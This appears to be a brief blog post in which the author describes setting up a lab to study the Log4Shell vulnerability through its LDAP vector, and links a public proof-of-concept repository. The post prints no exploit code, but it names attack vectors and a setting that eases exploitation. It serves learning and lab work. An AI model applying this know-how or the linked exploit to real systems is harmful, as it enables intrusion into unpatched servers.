As one of the most critical vulnerabilities of recent times, for which I had to patch some systems myself at work, I just had to learn more about the internals of CVE-2021-44228/CVE-2021-45046, better known as Log4Shell.
It by no means is rocket science (in fact, it’s one of the most easily exploitable vulnerabilities of all time), but it still requires some work to setup a lab, figure out the right format of the exploit, etc.
I picked the LDAP attack vector where I enabled the trustedSource to quickly get where I wanted to be. Most likely, I will play with some more advanced forms like circumventing this trustedSource setting by using gadgets, or play around with the DNS or RMI vectors…
For now, the repo can be found here, for anyone to play with: https://github.com/ElJeffroz/log4j-poc
Enjoy!